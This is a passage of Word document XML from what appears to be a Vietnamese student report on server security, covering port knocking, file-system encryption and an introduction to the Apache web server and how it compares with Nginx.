        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00475BAD">
        <w:t xml:space="preserve">Nếu các cổng đóng chính xác đã được "ping" theo đúng </w:t>
      </w:r>
      <w:r w:rsidR="00475BAD">
        <w:lastRenderedPageBreak/>
        <w:t>thứ tự quy định, tường lửa sẽ mở cổng mong muốn cho phép kết nối. Nếu không, cổng mong muốn sẽ không xuất hiện là mở.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C56E8D" w14:textId="7A590C0D" w:rsidR="00475BAD" w:rsidRDefault="001E5B1C" w:rsidP="00E54DE8">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Giả sử </w:t>
      </w:r>
      <w:r w:rsidR="00BD524C">
        <w:t>người dùng</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> muốn truy cập vào một dịch vụ chạy trên cổng 22 (SSH) của máy chủ web. </w:t>
      </w:r>
      <w:r w:rsidR="00BD524C">
        <w:t>Trước khi người dùng có thể truy cập vào cổng 22, bạn phải gửi các gói tin đến một chuỗi các cổng khác đã được định cấu hình trước. Ví dụ, các cổng đó có thể là 1234, 5678, và 9101</w:t>
      </w:r>
      <w:r w:rsidR="00A0362E">
        <w:t xml:space="preserve">. Người dùng cần gửi các gói tin theo đúng thứ tự đến các cổng 1234, 5678, và 9101. </w:t>
      </w:r>
      <w:r w:rsidR="0061139E">
        <w:t>Tường lửa (Firewall) sẽ nhận ra chuỗi các gói tin này và sau đó mở cổng 22 cho địa chỉ IP của người dùng</w:t>
      </w:r>
      <w:r w:rsidR="001B2520">
        <w:t xml:space="preserve"> đó. Nếu không gửi đúng các gói tin đến đúng các cổng theo đúng thứ tự quy định, tường lửa sẽ không mở cổng 22.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68005B0C" w14:textId="0E25D159" w:rsidR="001B2520" w:rsidRPr="00462826" w:rsidRDefault="008724E4" w:rsidP="00E54DE8">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Phương pháp này được sử dụng để cô lập các tài nguyên quan và chỉ cấp quyền truy cập và nhận thức về sự tồn tại của chúng cho những người dùng thực sự được phép. Cách tốt nhất để giữ một cánh cửa khóa là nếu người ta không biết cách tìm cánh cửa ngay từ đầu</w:t>
      </w:r>
      <w:r w:rsidR="000166B9">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6032F824" w14:textId="74A46D0A" w:rsidR="00BB6384" w:rsidRDefault="00542E46" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="567" w:hanging="567"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc171085493"/>
      <w:r>
        <w:t>Mã hóa hệ thống tệp tin</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="59B80152" w14:textId="2BB7E482" w:rsidR="003B17A7" w:rsidRPr="003B17A7" w:rsidRDefault="00971105" w:rsidP="00E35139">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Đôi khi với những phương pháp bảo mật mới nhất, hiện đại nhất nhưng </w:t>
      </w:r>
      <w:r w:rsidR="0059464D">
        <w:t>dữ liệu vẫn có thể bị đánh cắp kh</w:t>
      </w:r>
      <w:r w:rsidR="001F5DD2">
        <w:t xml:space="preserve">ỏi máy chủ. </w:t>
      </w:r>
      <w:r w:rsidR="004A25E6">
        <w:t xml:space="preserve">Một </w:t>
      </w:r>
      <w:r w:rsidR="00C83C66">
        <w:t>kĩ thuật phổ biến được áp dụng là mã hóa hệ thống tệp.</w:t>
      </w:r>
      <w:r w:rsidR="00CC78A8">
        <w:t xml:space="preserve"> Bằng cách mã hóa dữ liệu được lưu trên hệ thống máy chủ</w:t>
      </w:r>
      <w:r w:rsidR="00B71144">
        <w:t xml:space="preserve">, có thể ngăn chặn truy cập trái phép trong trường hợp </w:t>
      </w:r>
      <w:r w:rsidR="00C43210">
        <w:t xml:space="preserve">dữ liệu bị đánh cắp. </w:t>
      </w:r>
      <w:r w:rsidR="00895810">
        <w:t>Các tài liệu</w:t>
      </w:r>
      <w:r w:rsidR="00D00CC5">
        <w:t xml:space="preserve"> có tầm</w:t>
      </w:r>
      <w:r w:rsidR="00895810">
        <w:t xml:space="preserve"> quan trọng </w:t>
      </w:r>
      <w:r w:rsidR="00D00CC5">
        <w:t>lớn đối với doanh nghiệp, quân sự hoặc tài chính</w:t>
      </w:r>
      <w:r w:rsidR="00972135">
        <w:t xml:space="preserve"> thường khiến các doanh nghiệp và chính phủ lo lắng nếu rơi vào tay kẻ xấu</w:t>
      </w:r>
      <w:r w:rsidR="00425531">
        <w:t>. Hiện nay, có nhiều công cụ</w:t>
      </w:r>
      <w:r w:rsidR="0093282B">
        <w:t xml:space="preserve"> khác nhau để </w:t>
      </w:r>
      <w:r w:rsidR="00C52972">
        <w:t>mã hóa hệ thống tệp phù hợp với mọi người quản trị viên</w:t>
      </w:r>
      <w:r w:rsidR="006E7671">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="002A739F">
        <w:t xml:space="preserve"> Ví dụ như: </w:t>
      </w:r>
      <w:r w:rsidR="00C1508D">
        <w:t>BitLocker, VeraCrypt, FileVault,…</w:t>
      </w:r>
      <w:r w:rsidR="00F90C18">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="728E89D0" w14:textId="11F16024" w:rsidR="00252288" w:rsidRDefault="00252288" w:rsidP="00252288">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc171085494"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>CHƯƠNG 3: APACHE VÀ BẢO MẬT TRÊN APACHE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="62C0F5C1" w14:textId="77777777" w:rsidR="00252288" w:rsidRPr="00252288" w:rsidRDefault="00252288" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="200" w:after="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:b/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc171085495"/>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="76566C4D" w14:textId="77777777" w:rsidR="00252288" w:rsidRPr="00252288" w:rsidRDefault="00252288" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="200" w:after="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:b/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc171085496"/>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="611974A6" w14:textId="77777777" w:rsidR="00252288" w:rsidRPr="00252288" w:rsidRDefault="00252288" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="200" w:after="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:b/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc171085497"/>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="7473381F" w14:textId="27AA6E71" w:rsidR="00252288" w:rsidRDefault="00252288" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="40" w:name="_Toc171085498"/>
      <w:r>
        <w:t>Tổng quan về Apache</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="6AAB8304" w14:textId="61B85A3E" w:rsidR="00252288" w:rsidRDefault="00252288" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="567" w:hanging="567"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc171085499"/>
      <w:r>
        <w:t>Giới thiệu về Apache</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="533F3605" w14:textId="6D6EDFCE" w:rsidR="00E61857" w:rsidRDefault="00252288" w:rsidP="008037FA">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF1815">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Apache là một Web Server phổ biến hiện nay, cho phép bạn xây dựng một Website an toàn một cách đơn giản, không mất quá nhiều thời gian và công sức.</w:t>
      </w:r>
      <w:r w:rsidR="008037FA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF1815">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Đây là lựa chọn hàng đầu của nhiều doanh nghiệp và tổ chức. Apache được cài đặt trên phần cứng Web Server. Tên chính thức của Apache là Apache HTTP Server, do Apache Software Foundation phát triển và điều hành.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198EE95F" w14:textId="454C1293" w:rsidR="00805332" w:rsidRDefault="00805332" w:rsidP="00805332">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C66FB9F" wp14:editId="046404CB">
            <wp:extent cx="4091281" cy="2270760"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="1440313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99" cy="2278540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D458F9" w14:textId="220634D6" w:rsidR="00B349C5" w:rsidRDefault="002C6083" w:rsidP="002C6083">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc170814825"/>
      <w:r>
        <w:t xml:space="preserve">Hình 3. </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình_3. \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000F27E2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="0058251C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Logo Apache</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="7D6823DD" w14:textId="77777777" w:rsidR="00252288" w:rsidRPr="00252288" w:rsidRDefault="00252288" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="200" w:after="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc171085500"/>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="47DAFA92" w14:textId="77777777" w:rsidR="00252288" w:rsidRPr="00252288" w:rsidRDefault="00252288" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="200" w:after="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc171085501"/>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="3CAE6578" w14:textId="77777777" w:rsidR="00252288" w:rsidRPr="00252288" w:rsidRDefault="00252288" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="200" w:after="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc171085502"/>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="464B2614" w14:textId="77777777" w:rsidR="00252288" w:rsidRPr="00252288" w:rsidRDefault="00252288" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="200" w:after="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc171085503"/>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w14:paraId="4FDB2B32" w14:textId="77777777" w:rsidR="00252288" w:rsidRPr="00252288" w:rsidRDefault="00252288" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="200" w:after="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc171085504"/>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="7C3DB030" w14:textId="4FF8727B" w:rsidR="00252288" w:rsidRDefault="00252288" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="567" w:hanging="567"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc171085505"/>
      <w:r>
        <w:t>Cách thức hoạt động của Apache</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w14:paraId="012462AB" w14:textId="6F83BB22" w:rsidR="00252288" w:rsidRDefault="00252288" w:rsidP="005B5319">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C7701">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Công việc chính của Apache là giúp khởi tạo kết nối giữa trình duyệt của người dùng (như Cốc Cốc, Google Chrome, Firefox,...) và Server, rồi hỗ trợ truyền tải tập tin 2 chiều giữa 2 điểm cuối này theo cấu trúc Client - Server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B52840" w14:textId="15A6BA38" w:rsidR="00252288" w:rsidRDefault="00252288" w:rsidP="00252288">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C7701">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Giả sử khi người dùng truy cập vào Website doanh nghiệp và truy cập một trang Web cụ thể, ví dụ như trang chủ Homepage. Quá trình hoạt động sẽ như sau</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B845C08" w14:textId="2D09F439" w:rsidR="00252288" w:rsidRPr="008C7701" w:rsidRDefault="00252288" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1276"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C7701">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Trình duyệt của người dùng sẽ gửi yêu cầu tải trang Web Homepage lên Server</w:t>
      </w:r>
      <w:r w:rsidR="00B85A3D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718DA28B" w14:textId="7AFC5768" w:rsidR="00252288" w:rsidRPr="00252288" w:rsidRDefault="00252288" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="008C7701">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Phần mềm Server sẽ gửi trả kết quả là tất cả các tập tin cấu thành trang Homepage đó cho người dùng, bao gồm văn bản, hình ảnh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDDCF09" w14:textId="1FD33F58" w:rsidR="00252288" w:rsidRDefault="00252288" w:rsidP="005B5319">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C7701">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Server và Client có thể giao tiếp với nhau thông qua giao thức HTTP, và phần mềm Server (cũng chính là Apache) có trách nhiệm đảm bảo quá trình kết nối này được diễn ra ổn định và bảo mật nhất giữa 2 máy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EED1135" w14:textId="2DE8C35F" w:rsidR="00252288" w:rsidRDefault="00252288" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc171085506"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>So sánh Apache với các Web Server phổ biến khác</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w14:paraId="56193377" w14:textId="752905E5" w:rsidR="00252288" w:rsidRDefault="00252288" w:rsidP="00723C3B">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC51C9">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>So sánh Apache và 2 Web Server phổ biến hiện nay là Nginx và Apache Tomcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF11FC8" w14:textId="376D36F0" w:rsidR="00252288" w:rsidRPr="00252288" w:rsidRDefault="00252288" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="00BC51C9">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Điểm khác biệt giữa Apache và Ngix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50413375" w14:textId="4DBC7679" w:rsidR="00252288" w:rsidRPr="00252288" w:rsidRDefault="00252288" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="1985"/>
      </w:pPr>
      <w:r w:rsidRPr="00BC51C9">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Apache sử dụng cấu trúc dạng luồng, nên khi ứng dụng vào các Website có lưu lượng traffic lớn sẽ khiến ảnh hưởng đến hiệu suất, còn Nginx thì không</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DC0C3D" w14:textId="3C018093" w:rsidR="00252288" w:rsidRPr="00252288" w:rsidRDefault="00252288" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="1985"/>
      </w:pPr>
      <w:r w:rsidRPr="00BC51C9">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Nginx hỗ trợ xử lý theo hướng xử lý sự kiện, giúp chúng phân tán truy vấn hiệu quả, mang lại khả năng quản lý tốt hơn so với Apache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A00F9C9" w14:textId="4A8D053D" w:rsidR="00252288" w:rsidRPr="000F16B3" w:rsidRDefault="00252288" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="1985"/>
      </w:pPr>
      <w:r w:rsidRPr="00BC51C9">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Apache phù hợp với các doanh nghiệp vừa và nhỏ hơn Nginx, vì chúng có cách thức sử dụng đơn giản, dễ cấu hình và hỗ trợ nhiều modules hơn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
